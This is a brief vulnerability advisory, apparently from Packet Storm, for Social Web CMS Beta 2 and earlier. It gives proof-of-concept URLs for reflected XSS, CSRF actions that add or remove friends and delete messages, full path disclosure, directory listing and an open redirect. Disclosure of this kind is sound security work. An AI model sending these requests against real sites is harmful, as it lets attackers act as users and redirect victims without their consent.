Social Web CMS suffers from cross site scripting, cross site request forgery, path disclosure, and user redirection vulnerabilities.
96aba5ca15438fb64f35e68876edbc31b755dc427af8b72e6102712e9107cef1# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<https://gmail.com/>
# Software Link: https://www.socialwebcms.com
# Version: X <= Beta 2
#
# Vulnz:
#
#[Directory Listing]
https://server/modules/
#
#
#[XSS]
https://server/index.php?category=%22%3E[XSS]
#
#
#[CSRF]
-Add friends:
https://server/user/view/addfriend/login/[VALID_FRIEND]
or
https://server/user.php?login=[VALID_FRIEND]&view=addfriend
#
-Remove friends:
https://server]/user/view/removefriend/login/[VALID_FRIEND]
or
https://server/user.php?login=[VALID_FRIEND]&view=removefriend
#
-Remove Messages:
https://server/module.php?module=simple_messaging&view=delmsg&msg_id=[MESSAGE_ID]
#
#
#[Full Path Disclosure] (From Unlogged Browsing)
https://server/module.php?module=simple_messaging&view=delmsg&msg_id=
#
#[User Redirection]
https://server/module.php?module=simple_messaging&view=compose&to=[VALID_FRIEND]&return=[URL]
#
# EOF
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed